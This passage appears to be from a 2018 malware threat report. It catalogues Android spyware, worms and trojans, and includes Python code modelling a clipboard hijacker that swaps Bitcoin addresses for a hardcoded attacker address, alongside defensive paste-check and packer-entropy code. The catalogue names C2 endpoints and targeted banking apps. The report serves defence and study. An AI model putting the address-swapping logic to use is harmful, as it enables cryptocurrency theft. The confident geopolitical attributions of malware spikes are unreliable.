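ATTACKER_ADDR = "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"


def hijack_clipboard(clip_text, attacker_addr=ATTACKER_ADDR):
    """Model of the malware: replace every Bitcoin-looking address in the clipboard with the attacker's."""
    return BTC_ADDR_RE.sub(attacker_addr, clip_text)


def base58check_valid(addr):
    """Verify the 4-byte double-SHA256 checksum that every legacy Bitcoin address carries."""
    n = 0
    for ch in addr:
        idx = BTC_ALPHABET.find(ch)
        if idx < 0:
            return False          # character outside the Base58 alphabet
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    leading_zero_bytes = len(addr) - len(addr.lstrip("1"))   # each leading '1' encodes a 0x00 byte
    raw = b"\x00" * leading_zero_bytes + body
    if len(raw) != 25:            # version byte + 20-byte hash + 4-byte checksum
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


class PasteGuard:
    """Defensive counterpart: remember what the user copied and refuse a paste whose address differs."""
    def __init__(self):
        self.copied = ""

    def on_copy(self, text):
        self.copied = text

    def check_paste(self, text):
        expected = BTC_ADDR_RE.findall(self.copied)
        pasted = BTC_ADDR_RE.findall(text)
        return {
            "ok": expected == pasted,
            "expected": expected,
            "pasted": pasted,
            "checksums_ok": all(base58check_valid(a) for a in pasted),
        }


if __name__ == "__main__":
    guard = PasteGuard()
    guard.on_copy(USER_ADDR)                       # user copies the intended destination
    clipboard = hijack_clipboard(USER_ADDR)        # malware rewrites the clipboard behind her back
    print(guard.check_paste(clipboard))            # 'ok': False, so the swap is caught before sending
```

Note the division of labour: the checksum catches typos and corrupted addresses but will pass an attacker's well-formed address, so only the copy-versus-paste comparison (or the user reading the address back from the wallet before confirming) actually defeats the hijacker.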


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world

Although cryptominers have decreased in number, they seem to be returning in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising: today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Every smartphone now contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the contents of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, cybercriminals are not the only ones hunting for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to monitor their children, and it is easy to understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, posing as innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details and contacts (id, name, phone numbers) and the owner's email address. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and contact photos. After extracting all the data, the malware encrypts it with AES and sends it to the attackers' server (httphttpcgalimcomadminhrpupuphpdo=upload).

KevDroid records the victim's every phone call, then encrypts the recording and uploads it to the cybercriminals' server. In addition it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities: it takes control of the device camera, covertly records the victim's activity and sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details and device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via the official Google Play store. The spyware was camouflaged as a chat app called Dardesh Instant App, but when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly tracked all events on the infected device. Social networks were another means of dissemination.

Version-1: Dardesh Google Play Services Instant Apps
Version-2: Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1: Telegram Groups انتخاب دھم
Version-2: Postrall Yes For Referendum انتخاب دھم
Version-3: Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4: VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: it extracts SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

- Enable and disable the GPS services
- Record audio and send it to the Command & Control server
- Upload image files
- Collect information about installed applications
- Collect browser data
- Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.


In addition to the abilities of the previous versions, it includes some additional tricks:

- Extracts photos, audio and videos
- Records the screen
- Executes shell commands
- Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messenger data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application, but instead of a girlfriend it delivers a bundle of malicious abilities:

- Takes control of the Bluetooth adapter
- Extracts data about accounts, contact details and installed apps
- Extracts data from the WhatsApp message DB and related keys
- Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with a targeted hunt for banking applications on the device. It uses trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3: FaceBook Chrome

Disguises of Xloader


After infection Xloader connects to its C&C server and executes the following commands:

- Extract the device information
- Delete SMS
- Set ringer mode
- Monitor incoming SMS messages
- Clear memory
- Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
- Extract contact details
- Set Wi-Fi to always on

Version 2 can execute additional commands:

- Send SMS and read outgoing SMS
- Enable and disable a Wi-Fi connection
- Access a location specified by the attackers
- Make recordings
- Make calls

4.1.5 Stalker Spy

The next malware in our list is Stalker Spy. As you can see, it is the champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service Mobile Spy 随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage and deletes the originals after encryption. So we can call it a spy with a 007 licence.

Version 1: Adobe Flash Player
Version 2: Flash Player

Disguises of Mystery Bot

Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands the malware can execute on your device:


- Send_SMS: extract SMS content and send it to the C&C server
- Send_USSD: send the USSD to the C&C server
- Gethistory: monitor browser history
- Start_AllApp: gather info about installed applications
- Send_call: set the Intent action to call
- Forward_call: forward incoming calls
- ResForward_call: reset call forwarding
- Go_Smsmnd: delete SMS content
- Go_GetAlls: get SMS history
- Dell_sms: delete SMS content in a conversation
- Send_spam: send spam SMS
- Start_Inject: call the injector class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.

Here are some commands from its Command and Control server:

- contacts: get contact details and email id
- Mute: set action to mute
- Mms: get MMS content
- info: get device information


4.1.8 RedAlert

RedAlert switches between multiple "spy legends" to gain users' trust, wearing the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2: Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

- de.postbank.finanzassistent
- pl.mbank
- aib.ibank.android

The second version can also block access to some apps and websites, including Google Chrome, the Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, operates mostly in Iran. It spreads via third-party app stores, social networks and messengers.

Version 1: CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره Proxy دوست یاب Telegram Ton شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel and, notably, it is sold in three tiers: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run", but it keeps running in the background and starts its spying activity. It steals text messages, records audio, makes calls, determines the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat is disguised as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more a fraudster than a spy.

Version 1: Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot Reccoder-Call QRCodeBar Scanner APK Let me love you ringtone Iphone Ringtone Night light Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay

Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip option"; if the user taps it, the malware begins working in the background, subscribing the user to services she did not order. It reaches victims in the variety of disguises listed above.

4.1.11 CoinHive

The last entry in our Q2 Android malware list is CoinHive. We mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each of which improves its mining potential. It is disseminated via the counterfeit apps listed below, but one of its vectors is especially interesting.

Version-1: Netflix Hack Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via ... another cryptominer, named CoinMiner.

How is this possible? Imagine a cybercriminal who wants to infect victims with a cryptominer to use their resources for mining. She chooses CoinMiner for the purpose, downloads it and implants it on the victims' machines. She is unaware, however, that another cybercriminal had earlier infected CoinMiner with CoinHive. So the first attacker is herself a victim: thief robbing thief.

This story clearly illustrates the state of cybersecurity in Q2: no one can feel totally secure, and even a predator can turn prey in seconds.


4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Chart: Android-targeted malware in April 2018

4.2.2 May 2018

Chart: Android-targeted malware in May 2018


4.2.3 June 2018

Chart: Android-targeted malware in June 2018


5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm, by far, was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which in 2012 led to the arrest of 10 people by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected in Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructors

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

"Packed" malware refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and it leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
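The report's point is that packed code is compressed and therefore statistically unlike ordinary machine code, even when a modified packer hides the usual markers. As an added example (not part of the Comodo report or its tooling), the following Python heuristic scores executable sections by Shannon entropy, so a packer that merely renames UPX's default section names, as a modified UPX may do, still stands out; the section names, the 7.0 bits-per-byte threshold and the sample byte regions are constructed for illustration.

```python
"""Entropy-based packed-section heuristic (constructed example, not Comodo's code).

A packer compresses the original program body and prepends a small
decompression stub. The compressed body has near-random byte statistics,
while the stub and ordinary code do not, so per-section entropy flags packed
regions independently of section names.
"""
import math
import random
from collections import Counter

# Default section names written by stock UPX. A modified build (MUPX) can
# rename them, which is why a name check alone is not a reliable detector.
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}

# Assumed threshold for this example: compressed or encrypted data sits close
# to 8 bits per byte, ordinary x86 code well below 7.
PACKED_ENTROPY = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_section(name: str, data: bytes) -> dict:
    """Return the section's entropy and every reason it looks packed."""
    reasons = []
    if name in UPX_SECTION_NAMES:
        reasons.append("upx-section-name")
    ent = shannon_entropy(data)
    if ent >= PACKED_ENTROPY:
        reasons.append("high-entropy")
    return {"name": name, "size": len(data), "entropy": round(ent, 2), "reasons": reasons}


def scan_sections(sections) -> list:
    """Scan (name, bytes) pairs and return only the suspicious sections."""
    return [r for r in (classify_section(n, d) for n, d in sections) if r["reasons"]]


def build_sample_sections(seed: int = 7):
    """Constructed stand-in for an executable's sections: a plain-code region,
    a stock-UPX region, and an MUPX-style region whose section was renamed but
    whose body is the same high-entropy compressed blob."""
    rng = random.Random(seed)
    compressed_blob = bytes(rng.getrandbits(8) for _ in range(4096))
    # Repetitive constructed byte pattern standing in for ordinary code.
    plain_code = b"\x60\xbe\x00\x10\x40\x00\x8d\xbe\x00\x00\xc0\xff" * 64
    return [
        (".text", plain_code),         # normal name, low entropy: no hit
        ("UPX1", compressed_blob),     # stock UPX: both indicators fire
        (".rdata2", compressed_blob),  # renamed section: entropy still fires
    ]


if __name__ == "__main__":
    for hit in scan_sections(build_sample_sections()):
        print(hit)
```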

In Q2 2018 Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooders

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but it is still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.


6 Vertical Analysis

In this section let's examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in just one but in multiple verticals, clearly making them a current strategic threat across the world.


First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.


7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect information as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.


8 Conclusions

In Q2 Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but also presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery method, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

